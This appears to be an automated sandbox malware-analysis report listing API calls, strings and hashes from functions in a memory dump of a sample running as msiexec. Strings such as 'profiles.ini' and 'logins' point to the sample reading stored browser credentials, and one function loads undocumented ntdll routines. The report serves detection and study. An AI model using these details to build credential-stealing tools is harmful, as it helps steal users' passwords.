                                                                                                        • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                        • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                        • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                        • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                        • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                        • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                        • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                        • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                        • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                        • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                        • String ID:
                                                                                                        • API String ID: 829165378-0
                                                                                                        • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                        • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                        • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                        • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                        Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00404172
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                        • wcscpy.MSVCRT ref: 004041D6
                                                                                                        • wcscpy.MSVCRT ref: 004041E7
                                                                                                        • memset.MSVCRT ref: 00404200
                                                                                                        • memset.MSVCRT ref: 00404215
                                                                                                        • _snwprintf.MSVCRT ref: 0040422F
                                                                                                        • wcscpy.MSVCRT ref: 00404242
                                                                                                        • memset.MSVCRT ref: 0040426E
                                                                                                        • memset.MSVCRT ref: 004042CD
                                                                                                        • memset.MSVCRT ref: 004042E2
                                                                                                        • _snwprintf.MSVCRT ref: 004042FE
                                                                                                        • wcscpy.MSVCRT ref: 00404311
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                        • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                        • API String ID: 2454223109-1580313836
                                                                                                        • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                        • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                        • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                        • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                        Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                        • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                        • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                        • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                        • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                        • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                        • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                        • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                        • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                        • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                        • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                        • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                          • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                          • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                        • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                        • API String ID: 4054529287-3175352466
                                                                                                        • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                        • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                        • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                        • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                        Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                        • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                        • API String ID: 3143752011-1996832678
                                                                                                        • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                        • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                        • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                        • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                        Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                        • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                        • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                        • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                        • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                        • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                        • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                        • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                        • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                        • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                        • API String ID: 667068680-2887671607
                                                                                                        • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                        • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                        • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                        • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                        Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                        • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                        • API String ID: 1607361635-601624466
                                                                                                        • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                        • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                        • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                        • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                        Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _snwprintf$memset$wcscpy
                                                                                                        • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                        • API String ID: 2000436516-3842416460
                                                                                                        • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                        • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                        • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                        • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                        Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                          • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                          • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                          • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                          • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                          • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                          • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                          • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                          • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                          • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                          • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                        • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                        • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                        • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                        • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                        • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                        • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                        • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                        • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                        • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                        • String ID:
                                                                                                        • API String ID: 1043902810-0
                                                                                                        • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                        • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                        • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                        • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                        Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                                        • _snwprintf.MSVCRT ref: 0044488A
                                                                                                        • wcscpy.MSVCRT ref: 004448B4
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                        • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                        • API String ID: 2899246560-1542517562
                                                                                                        • Opcode ID: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                                                        • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                        • Opcode Fuzzy Hash: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                                                        • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                        Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040DBCD
                                                                                                        • memset.MSVCRT ref: 0040DBE9
                                                                                                          • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                          • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                                          • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                          • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                        • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                        • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                        • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                        • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                        • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                        • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                        • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                        • API String ID: 3330709923-517860148
                                                                                                        • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                        • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                        • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                        • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                        Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                          • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                          • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                        • memset.MSVCRT ref: 0040806A
                                                                                                        • memset.MSVCRT ref: 0040807F
                                                                                                        • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                        • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                        • memset.MSVCRT ref: 004081E4
                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                          • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                          • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                          • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                          • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                          • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                          • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                          • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                          • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                          • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                          • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                        • String ID: logins$null
                                                                                                        • API String ID: 2148543256-2163367763
                                                                                                        • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                        • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                        • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                        • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                        Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                        • memset.MSVCRT ref: 004085CF
                                                                                                        • memset.MSVCRT ref: 004085F1
                                                                                                        • memset.MSVCRT ref: 00408606
                                                                                                        • strcmp.MSVCRT ref: 00408645
                                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                        • memset.MSVCRT ref: 0040870E
                                                                                                        • strcmp.MSVCRT ref: 0040876B
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                        • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                        • String ID: ---
                                                                                                        • API String ID: 3437578500-2854292027
                                                                                                        • Opcode ID: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                                        • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                        • Opcode Fuzzy Hash: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                                        • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                        Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0041087D
                                                                                                        • memset.MSVCRT ref: 00410892
                                                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                        • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                        • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                        • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                        • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                        • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                        • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                        • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                        • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                        • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                        • String ID:
                                                                                                        • API String ID: 1010922700-0
                                                                                                        • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                        • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                        • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
